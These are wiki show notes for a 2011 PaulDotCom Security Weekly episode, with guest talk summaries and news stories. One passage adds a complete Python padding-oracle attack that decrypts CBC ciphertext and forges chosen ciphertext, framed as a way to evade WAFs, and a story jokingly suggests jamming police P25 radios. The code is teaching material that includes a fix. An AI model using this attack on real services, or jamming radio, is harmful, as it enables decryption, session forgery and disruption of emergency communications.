Episode254

From Paul's Security Weekly

Revision as of 19:23, 11 July 2013

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 254 for Thursday August 11th, 2011.

  • The PaulDotCom Espanol episodes with Julio Canto, Lorenzo Martinez, Chema Alonso, Ruben Santamarta and Raul Siles are available here: http://pauldotcom.com/wiki/index.php/PaulDotCom_Espanol
  • Don't miss the August 31st Late Breaking Computer Attack Vectors Webcast, sponsored by Core Security Technologies, with Larry "Mo' Hawk" Pesce: https://cybersecurityworldevents.webex.com/cybersecurityworldevents/onstage/g.php?t=a&d=664509513
  • If you couldn't make it to BlackHat, then consider instead the always fabulous SANS Las Vegas for "Advanced Vulnerability Scanning Techniques Using Nessus", Saturday, September 17 - Sunday, September 18: http://www.sans.org/network-security-2011/description.php?d=4921
  • DerbyCon: Louisville, Kentucky, September 30th to October 2nd. Catch Carlos Perez's training session "Automating Post Exploitation with Metasploit" Friday and Saturday of the Con from 4:00PM to 9:00PM: http://www.derbycon.com/automating-post-exploitation-with-metasploit
  • SANS 617 - Wireless Ethical Hacking, Penetration Testing, and Defenses with Larry in the salsa capital of the world: NYC on August 22nd - 27th: http://www.sans.org/new-york-2011-cs-2/description.php?tid=4467
  • Jack wants us to pimp Sec Burn Out: http://www.secburnout.org
  • Don't forget to read our blog (http://pauldotcom.com/), participate on our mailing list (http://mail.pauldotcom.com/listinfo), visit PaulDotCom Insider (http://pauldotcom.com/insider/), follow us on Twitter (http://twitter.com/pauldotcom), join the IRC channel at irc.freenode.net #pauldotcom, watch our videos (http://pauldotcom.blip.tv) and add us on Facebook (http://www.facebook.com/therealpauldotcom) where we can be "friends".
  • We're spinning up a new mini-podcast/videocast and we're looking for topics from our listeners.

Episode Media

MP3 pt 1: http://traffic.libsyn.com/pauldotcom/PaulDotCom-254-Part1.mp3

MP3 pt 2: http://traffic.libsyn.com/pauldotcom/PaulDotCom-254-Part2.mp3

Guest Tech Segment Mini-Marathon: A Special Night with Trustwave's SpiderLabs!

Amazingly True Stories of Real Penetration Tests with Rob Havelt & Wendel Henrique

7:30 PM EDT / 6:30 PM CST

Rob Havelt, director of penetration testing, and Wendel Henrique, security consultant, will present Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests.

Rob is Director of SpiderLabs' Penetration Testing Practice, where he oversees all aspects of network and infrastructure security testing and wireless network testing. Formerly a bourbon-fueled absurdist, raconteur, and man about town, Rob is currently a sardonic workaholic occasionally seeking meaning in the finer things in life — Rob is, and will always be, a career hacker.

Wendel is a consultant for pen testing at Trustwave, where he has discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications.

The presentation offers:

  1. The unique opportunity to see real, interesting, uncommon and some non-trivial attacks that can't be found by automated tools.
  2. Material culled from the more than 2300 penetration tests delivered last year by SpiderLabs; only the coolest and freakiest were selected to present at DEFCON 19.
  3. By the end of this presentation, they hope to have you thinking about the systems and applications that organizations use every day, and how those may be used against them.

The attacks are:

  • Do you want Fries with that Hack?
  • One PBX Will Rule Them All Hack.
  • The Inside-Out VPN Hack.
  • The Island Nation and Port 0 Hack.
  • The Caucasian-Asian Love Hack.
  • In Soviet Russia Hackers Monitor You Hack.
  • Oracle and The New Tool Hack

Traps of Gold by Andrew Wilson & Michael Brooks

8:00 PM EDT / 7:00 PM CST

Traps of Gold is a study which examines the offenses and defenses of web application security and introduces "maneuverability" - a new strategy for fighting back.

Andrew specializes in application security assessment, penetration testing, threat modeling and the secure development life cycle. Andrew is active as a leader of the Phoenix OWASP group and is a Microsoft MVP in Windows Azure. He is not a Cabal member.

Michael works for SiteWatch, where he composes exploit code, which he considers a challenging and privileged art form. Michael is on PaulDotCom because he believes secure software is a luxury that should be shared. He's also in the April - June 2011 edition of the Google Security Hall of Fame.

[Image: TrapsofGold.jpg]

Speaking with Cryptographic Oracles by Dan Crowley

8:30 PM EDT / 7:30 PM CST

Speaking with Cryptographic Oracles is a discussion of methods for finding and exploiting encryption, decryption, and padding oracles from a black box perspective.

Dan is an Application Security Consultant for Trustwave's SpiderLabs and is particularly focused on vulnerabilities caused by a failure to account for little known or even undocumented properties of the platforms on which applications run. He especially enjoys playing around with Web based technologies and rock climbing, has been known to be a unicorn Furnace, and makes a mean chili quite worthy of a PaulDotCom post-exploitation towel.

  1. What is an Oracle?
  2. How can people really bad at math translate ciphertext into plaintext?
  3. How can this help us evade detection and prevention of web app attacks?
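The second question above, how someone without much math turns ciphertext into plaintext, is exactly what a CBC padding oracle lets you do, and the third follows from it: once you can recover the cipher's output for any block you can also build ciphertext that decrypts to a plaintext of your choosing, so the attack string reaches the application already encrypted and a WAF never sees it. The Python below is an added worked example, not code from the talk or from Trustwave. It assumes a toy HMAC-based Feistel block cipher as a stand-in for AES (the attack does not depend on the cipher), a constructed sample plaintext, and a padding oracle that is simply the server's PKCS#7 check wrapped in a function; the attacker side touches only that oracle, never the key.

```python
import hashlib, hmac, os
BLOCK = 16
SECRET = b"user=guest;role=user;session=0xCAFE"  # constructed sample plaintext

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 4-round Feistel cipher (HMAC-SHA256 round function): an assumed stand-in for AES. NOT secure.
def _f(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def pad(data):  # PKCS#7, as the vulnerable server uses it
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable failure is the oracle
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = [], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(prev, padded[i:i + BLOCK]))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(xor(prev, block_decrypt(key, ct[i:i + BLOCK])))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def recover_intermediate(oracle, target):
    """Recover D_key(target), the cipher output before the CBC XOR, one byte at a time.
    The attacker has only oracle(iv, ciphertext) -> bool, never the key."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos  # padding value we want the server to see
        forged = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):  # bytes already known: force them to padv
            forged[k] = inter[k] ^ padv
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:  # a hit here could also be \x02\x02 etc.; perturb the
                probe = bytearray(forged)  # byte to the left: only real \x01 padding survives
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe), target):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted a byte; is it really a padding oracle?")
    return bytes(inter)

def decrypt_with_oracle(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b"".join(xor(recover_intermediate(oracle, blocks[i]), blocks[i - 1]) for i in range(1, len(blocks)))
    return unpad(plain)

def encrypt_with_oracle(oracle, plaintext):
    """CBC-R: build (iv, ciphertext) that decrypts to a chosen plaintext, working backwards."""
    padded = pad(plaintext)
    cur = os.urandom(BLOCK)  # any value serves as the final ciphertext block
    chain = [cur]
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        cur = xor(recover_intermediate(oracle, cur), padded[i:i + BLOCK])
        chain.append(cur)
    chain.reverse()
    return chain[0], b"".join(chain[1:])

def demo():
    key, iv = os.urandom(16), os.urandom(16)  # the attacker never sees these
    ct = cbc_encrypt(key, iv, pad(SECRET))
    def oracle(iv_, ct_):  # everything the server leaks: did the padding verify?
        try:
            unpad(cbc_decrypt(key, iv_, ct_))
            return True
        except ValueError:
            return False
    recovered = decrypt_with_oracle(oracle, iv, ct)
    forged_iv, forged_ct = encrypt_with_oracle(oracle, b"user=guest;role=admin")
    return recovered, unpad(cbc_decrypt(key, forged_iv, forged_ct))
```

Each recovered byte costs at most 256 oracle queries, so a block is at most 4096 queries, and the re-check on the last byte covers the case where a guess accidentally yields valid padding of length two or more. On a real target the oracle is whatever distinguishes a padding failure from any other failure: a different HTTP status, error page, or response time. The server-side fix is to authenticate the ciphertext (an HMAC over IV and ciphertext, or an AEAD mode) and reject anything that fails verification before decrypting, so every malformed input fails the same way.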

Stories For Discussion

Steve Holden, DefCon Talks Summary

Steve is a senior systems engineer for a U.S. Navy R&D organization in San Diego. His key research focus areas include: information technology systems, enterprise computing, computer network security, and project management. Steve is on to give us an overview of the talks he attended at DefCon 19.

Larry's Stories

  1. Government disruptors carry pink pagers (http://www.cqdx.ru/ham/misc/p-25-radios-killed-by-30-toy/) - [Larry] - Thanks to Travis Goodspeed (and others) who have hacked the GRRLtech IM-ME pink pager to do all sorts of things, you can now use it to DoS government/federal law enforcement communications. First off, the communications are secured with a protocol known as Project 25 (P25), which they were able to monitor using parts from Radio Shack. What they were able to determine is that P25 does not use spread spectrum (and I'm guessing frequency hopping), but instead relies on metadata encoded in the transmission in order to decipher the encoded transmission. So, what happens if that metadata is interrupted? The communications cannot be decoded. In fact, it only takes a "jamming" pulse of 1/100th of a second during portions of the metadata transmission to DoS the transmission. This might be a nice thing to deploy at your home during a SHTF situation, as P25 radios are allegedly in use by every major law enforcement agency. After just reading the whitepaper (http://www.usenix.org/events/sec11/tech/full_papers/Clark.pdf), Travis was involved, as was Sandy Clark (sending hugs your way), whose talk I missed at DEFCON.
  2. CDMA and 4G MitM'ed at DEFCON? (http://seclists.org/fulldisclosure/2011/Aug/76) - [Larry] - Who knows. This post claims yes, and that attacks were launched against PCs and Android devices. No mention of iPhone attacks. Honestly it makes sense, as all the moving parts exist. I did notice my phone getting dumbed down to GPRS, clicks on my calls, and some seriously delayed SMS messages. Sure it is possible, but I won't believe it until I see proof…
  3. …and GPRS cracked (http://www.h-online.com/security/news/item/GPRS-connections-easily-tapped-1321018.html) - [Larry] - Karsten Nohl will be releasing some tools (but not the keys) in order to decrypt GPRS data communications. During his research, he was able to determine that various carriers use different varieties of the A5 algorithm used with GSM networks, and some had no encryption at all. The hardware needed? Just some older, cheap, readily available phones.

Paul's Stories

  1. Top 10 Things I Learned at Blackhat 2011, Defcon 19 and Vegas (http://pauldotcom.com/2011/08/top-10-things-i-learned-at-bla.html) - Tip #1, bring extra socks.
  2. Wfuzz 2.0 released! (http://edge-security.blogspot.com/2011/08/wfuzz-20-released.html) - Love this tool, we did a tech segment on it. Works great for sheer brute force fuzzing of web applications. More payloads, encoders, and flexibility!
  3. Xkcd On Password Strength (http://xkcd.com/936/) - And still, people had words with me on Twitter. Do the MATH! Also, you have to factor in how easy it is to remember.
  4. HP JetDirect PJL Interface Universal Path Traversal (http://www.exploit-db.com/exploits/17635/) - Really cool exploit for PJL printers, in the Metasploit framework; this and one other module let you list files and read them. Works on PXXX series printers according to the exploit.
  5. Leaving Wi-Fi Connections 'Open' Can Be Costly (http://newswire.xbiz.com/view.php?id=137331) - Open Wifi, still! It's an easy thing to do: set a password on your router. Now, does this mean you should lock your doors and windows too, otherwise it's just like inviting someone to come in and steal your TV? Leaving a loaded gun around just invites people to pick it up and start shooting? Do you have to show that you tried to secure it? Or you will end up like this guy: "defendant named in a recent BitTorrent suit recently was ordered to pay $10,401 despite statements that he never downloaded or uploaded any of the porn studio's content. In the judgment, he acknowledged his negligence for not securing his connection." Damn, $10k worth of porn, wish he was my neighbor :)
  6. Why Does This Guy Have an Assault Rifle at the Apple Store? (http://gizmodo.com/5829999/why-does-this-guy-have-an-assault-rifle-at-the-apple-store) - One word answer: Photoshop. Don't believe everything you see on the web (it's a damn cool SIG SG 550 too, so hot).
  7. Black Hat 2011: The Rise Of The Machines (http://blog.tenablesecurity.com/2011/08/blackhat-2011-the-rise-of-the-machines.html) - My adventures at Blackhat.